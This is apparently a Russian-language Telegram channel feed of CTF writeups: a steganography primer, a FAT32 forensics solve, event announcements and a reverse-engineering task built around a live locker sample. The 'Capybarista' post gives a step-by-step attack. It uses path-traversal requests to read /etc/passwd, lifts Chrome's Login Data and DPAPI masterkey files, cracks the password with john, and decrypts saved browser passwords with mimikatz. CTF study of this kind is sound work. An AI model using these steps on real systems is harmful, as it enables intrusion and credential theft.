Райтапы по CTF{2026}
описание
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ 💬 Наш чатик: @writeup_chat ✍️ По любому вопросу можно писать мне: @freenameruuuu ✅ Таски решать тут: @writeup_ctf_bot
4 440
подписчиков
Охват к подписчикам
58,4%
ERR
Реакции к просмотрам
0,56%
509 на 39 постов
Пересылки к просмотрам
1,51%
1 376
Постов в день
0,3
всего 109
Где отзываются чаще
доля реакций к просмотрам- 28 мая 2025 г.Привет, кибератлеты! Сегодня я расскажу вам про стеганографию — искусство прятать информацию так, чтобы ее никто не обнаружил, а порой даже не заподозрил ее существование. Никакой скучной теории, только самое полезное для CTF. Я расскажу про основные термины, как вообще прячут и достают данные, чем стеганография отличается от криптографии и где это все реально используют. Ну а в конце — немного практики. Основные термины — без воды: • Цифровая стеганография — это такое направление стеганографии, где прячут секреты внутри цифровых объектов (например, в картинках, музыке или видео). При этом третья сторона совершенно не подозревает, что кажущееся безобидным изображение или аудио содержит скрытое сообщение или файл. В CTF мы занимаемся именно цифровой стеганографией. • Сообщение (скрытое сообщение, секрет) — это то, что мы прячем (например, флаг "CTF{flag}" или файлик flag.txt). • Контейнер (стегоконтейнер, носитель) — это "обертка" для нашего секрета, то есть что-то, что содержит скрытые данные. Это может быть что угодно: картинка, аудио, видео или даже текст. • Ключ (стегоключ) — как пароль. Часто, чтобы вытащить секрет из контейнера, нужен этот самый ключ. Например, ключ (пароль) может понадобиться для извлечения секрета при работе с программами Steghide и OpenStego. • Cтегоутилита — это просто программа, с помощью которой мы можем прятать или извлекать наши секреты. Классические примеры — это Steghide и OpenStego, о которых я говорил выше. Как это работает? • Внедрение — "зашиваем" секрет в контейнер (например, прячем архив в картинку). • Извлечение — достаем спрятанное, если знаем, как и где искать. Где обычно прячут флаги? • EXIF-данные фото — загляни в метаданные, там часто оставляют подсказки. Метаданные – это сведения о самих данных. Эллиот из сериала "Мистер Робот" как-то сказал: "Одно дело получить информацию, но знать как ее создали, где, когда и кто, часто бывает важнее. Часто, загружая фотографии в социалки, люди не понимают, что сообщают используемой соцсети тип фотокамеры, модель телефона, свое имя, местонахождение – все, что указано в метаданных фотографии." • Младший бит (LSB) — если картинка выглядит нормально, попробуй покрутить ее в Stegsolve. LSB — это последний бит числа, который почти не влияет на цвет. Например: 254 в двоичном представлении — 11111110, 255 — 11111111. Разница всего в 1 бит, и глаз ее не заметит. В CTF так часто прячут флаги — особенно в PNG. • Спектр звука — если на слух ничего странного нет, открой Sonic Visualiser и посмотри на спектрограмму. Данные могут быть зашиты в частотах! • Структура файла — hex-редактор в руки, и вперед копать! Для каждого метода — свой инструмент. Иногда без нужной утилиты секрет не достать. Как стеганография применяется в реальной жизни? Наверное, у вас возник вопрос: "А где вообще это применяется?" Вот несколько примеров: • Защита конфиденциальной информации (передача секретных данных так, чтобы никто не заметил); • Защита авторских прав (невидимые водяные знаки). Чем стеганография отличается от криптографии? • Криптография превращает данные в непонятный набор символов (шифрует их, скрывая смысл); • Стеганография скрывает факт существования данных, а не их смысл (как криптография). Можно сделать вывод, что эффективнее всего криптография и стеганография работают вместе, но об этом — в другой раз. А теперь — практика! Посмотрите на картинку, которую я прикрепил к посту. Вроде бы обычная картинка, правда? А вот и нет — там спрятан флаг! Первые трое, кто найдет его и напишет мне в ЛС, получат упоминание в следующем посте. Автор: @Max_RSC #CTF #стеганография #кмб #кибербезопасность #дляновичков3,07%
- 19 мая 2025 г.без подписи1,40%
- 8 мая 2025 г.Where is my Pony? NullByte Eternal Games Writeup от @Max_RSC Без лишних предисловий перейдем к делу. Нам дали какой-то flashdrive. На всякий случай сделаем strings: вдруг флаг лежит в открытом виде? strings flashdrive | grep -i X0G4M3 # Вывод: X0G4M3{Th1s_1S_N0t_MY_B3l0v3D_P0nY} Фейк! Почему я не удивлен :D Кидаем в file, чтобы понять, что представляет собой этот файл: file flashdrive # Вывод: flashdrive: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", sectors/cluster 8, Media descriptor 0xf8, sectors/track 32, heads 64, hidden sectors 26116096, sectors 4192256 (volumes > 32 MB), FAT (32 bit), sectors/FAT 4088, reserved 0x1, serial number 0xd873f71c, unlabeled Окей, это образ флешки. FAT32, куча секторов, скрытых разделов — в общем, все как обычно: у @CyberFazaN легко не бывает. Чтобы посмотреть, что на флешке, воспользуемся утилиткой fls из пакета sleuthkit: fls -r -f fat32 -o 0 flashdrive # Вывод: DO_NOT_OPEN/ # ну конечно, сразу хочется туда залезть! MyBelovedVideo.mp4 # подозрительно милое название... wallpaper.png # вряд ли это интересно .hidden # о, папочка с секретиками! .NotThat.jpg # классика: "это не то, что ты ищешь" (скорее всего, как раз именно то) ______~1.PNG # похоже на битую картинку LOOOOOOOVEEEEEEEE.txt # это явно не просто текстовик... Берем icat из пакета sleuthkit и начинаем вытаскивать все подряд: icat -o 0 flashdrive 135 > MyBelovedVideo.mp4 icat -o 0 flashdrive 6 > wallpaper.png # и так далее... Файл LOOOOOOOVEEEEEEEE.txt выглядит как текстовый, но... file LOOOOOOOVEEEEEEEE.txt # Вывод: LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.txt: JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "Nice", progressive, precision 8, 720x850, components 3 Оказывается, это JPEG. Переименовываем: mv LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.txt LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.jpg Открываем картинку: eog LOOOOOOOOOOOOOOOVEEEEEEEEEEEEEE.jpg Видим флаг. Ссылка на задание #forensics #NullByte #NBGames #writeup1,30%
- 23 апр. 2025 г.#misc #forensics Капибариста 1) Идем на сайт и видим форму с логином. Креды нам не даны, поэтому тыкаем по единственной доступной кнопке - политике о персональных данных. Попадаем на URL: https://t-barista-adminfilestorage-XXXXXX.spbctf.org/?path=/policy.pdf&action=download 2) Пробуем поменять путь и убрать тег action: GET /?path=/../../../../../../../../../../../etc/passwd HTTP/2 В ответ получаем: <html lang=en> <title>403 Forbidden</title> <h1>Forbidden</h1> <p>Попытка взлома</p> Ага... А если убрать тег action? GET /?path=/ HTTP/2 Попадаем в файловый менеджер в вебе! Однако ничего интересного в текущей папке не находим. Пробуем выбраться при помощи следующего пейлоада: GET /?path=/./../ HTTP/2 Вылетаем в корневую директорию, кайф Можем считать /etc/passwd: GET /?path=/./../etc/passwd HTTP/2 Ответ: <textarea cols="80" rows="25">root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/mail:/sbin/nologin news:x:9:13:news:/usr/lib/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin cron:x:16:16:cron:/var/spool/cron:/sbin/nologin ftp:x:21:21::/var/lib/ftp:/sbin/nologin sshd:x:22:22:sshd:/dev/null:/sbin/nologin games:x:35:35:games:/usr/games:/sbin/nologin ntp:x:123:123:NTP:/var/empty:/sbin/nologin guest:x:405:100:guest:/dev/null:/sbin/nologin nobody:x:65534:65534:nobody:/:/sbin/nologin </textarea> Пропустим момент с бесконечными поисками интересных файлов и перейдем к сути: в /mnt примонтирован виндовый диск C: 3) Находим интересные приложения на диске C: GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome HTTP/2 По этому пути узнаем, что в системе стоит Chrome. А значит, там может быть сохранена кука для авторизации на сайте! Забираем SQLite базу данных со всеми кредами хрома: GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Default/Login+Data HTTP/2 База данных на ОС Windows зашифрована так называемым masterkey, который мы можем достать по пути GET /?path=/./../mnt/C/Users/capybarman/AppData/Roaming/Microsoft/Protect//S-1-5-21-1023654651-2831612651-3133783694-1000/c637715b-e447-4cd5-9a72-445ef3861446 HTTP/2 Однако не все так просто - masterkey в свою очередь зашифрован паролем пользователя. Поэтому используем утилиту DPAPImk2john и сбрутим хеш: python3 DPAPImk2john.py --sid="S-1-5-21-1023654651-2831612651-3133783694-1000" --masterkey="c637715b-e447-4cd5-9a72-445ef3861446" context="local" > hash.txt Ну и запустим john со словарем rockyou.txt на полученный хеш. Получим пароль Capybara1792 4) Для расшифровки masterkey запустим утилиту mimikatz и выполним: dpapi::masterkey /in:"c637715b-e447-4cd5-9a72-445ef3861446" /sid:"S-1-5-21-1023654651-2831612651-3133783694-1000" /password:"Capybara1792" /protected В самом низу будет наш masterkey. 5) Расшифруем ключ при помощи полученного masterkey, также используя mimikatz. Для начала вытащим сам зашифрованный ключ: GET /?path=/./../mnt/C/Users/capybarman/AppData/Local/Google/Chrome/User+Data/Local+State HTTP/2 Он будет находиться по ключу os_crypt.enrypted_key в JSON файле по пути выше. Также перед записью в файл его надо декодировать из base64 и убрать первые 5 символов из раскодированного значения - DPAPI. Сохраним результат в файл dec_data Запускаем mimikatz и вводим: dpapi::blob /masterkey:MASTERKEY_FROM_4_STEP /in:"dec_data" /out:"aes.dec" 6) Теперь надо вынуть password из вытащенной на 3 этапе базы данных SELECT origin_url, username_value, password_value FROM logins И расшифровать при помощи полученного AES-ключа (можно использовать этот скрипт, например) 7) Получаем пароль OmgSoAdminPasswordVerySecure2025 с логином admin, авторизуемся на сайте, отключаем опцию "только соевое молоко", наслаждаемся анимацией и получаем флаг! Автор: @ll0ydik1,07%
- 12 янв.без подписи1,06%
- 27 февр.🐈 Хвостатые «инцидент-менеджеры» 🐕 Они встретят у точки входа в домашний периметр, поддержат при расследовании взлома и со стрессом справиться помогут. Домашние питомцы инфобезопасников часто по-настоящему незаменимы. 🟠 В новом материале «Киберболоида» мы провели перепись киберкотов и киберсобак, а также собрали забавные истории о каждом ИБ-хвосте. #киберболоид #lifestyle1,00%
- 2 июл.Kaspersky{CTF} пройдёт 29–30 августа — это второй шанс попасть в финал SAS CTF и побороться за поездку на Бали и призовой фонд $18 000. Участвовать могут как академические, так и корпоративные команды. В программе: - криптография - реверс-инжиниринг - форензика - PWN - AI-задачи Некоторые задания вдохновлены реальными расследованиями команды Kaspersky GReAT — будет не только сложно, но и максимально приближено к практике. Победители каждого региона получат: - приглашение в финал SAS CTF на Бали - шанс побороться за призовой фонд $18 000 - покрытие проживания - поддержку в оплате проезда (до 5 участников старше 18 лет) Формат: онлайн Регистрация до 28 августа: https://capturetheflag.ru/ctf/obdgaz3611-kasperskyctf-2026 #ctf0day #ctf #capturetheflag #захватфлага0,84%
- 29 июл.🚩 DoubleAgent 🌐 Площадка: aclabs.pro 📂 Категории: Web 🐧 ОС: Linux 🔥 Сложность: Medium Крутой таск средней сложности на внимательность. Рутовый флаг брать будет легче тем, кто изучал основы загрузки сессий в unix-подобных системах. 🔗 Читать райтап: https://github.com/alfabuster/Aclabs-pro-Writeups/blob/main/CTF%207%20Season/DoubleAgent/DoubleAgent.md #aclabs #Linux #Web #CMS 💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube0,82%
- 6 февр.без подписи0,79%
- 16 июн. 2025 г.#reverse Детский локер Я запустил этот вирус и теперь не могу его деактивировать, так как не знаю код для разблокировки. Поможешь? Пароль – infected. Формат флага: KFCCTF{md5(значение)} Пример: KFCCTF{f2d6a605266cd0f4085769be78848a90} Важно: Данный файл является действующей малварью, запускать ТОЛЬКО в изолированном окружении. Автор: @while_not_False Напоминаем, что флаг нужно сдавать боту @writeup_ctf_bot 💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube0,69%
- 4 июл.без подписи0,69%
- 16 маяПродолжаем серию райтапов с CyberDefenders #bluteam #soc #forensic 🔥Rhadamanthys Платформа: CyberDefenders Автор @kontsevaya_ym Ссылка на райтап [клик] 🖱 • Инструменты: Event Log Explorer, DB Browser for SQLite, Registry Explorer, EvtxECmd, FTK Imager, PECmd • Темы: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Collection • Задача: расследование активности инфостилера Rhadamanthys — анализ артефактов системы, логов событий, реестра и пользовательской активности 💬 Канал & Чат & Бот с тасками| 📺 RUTUBE | 📺 YouTube0,68%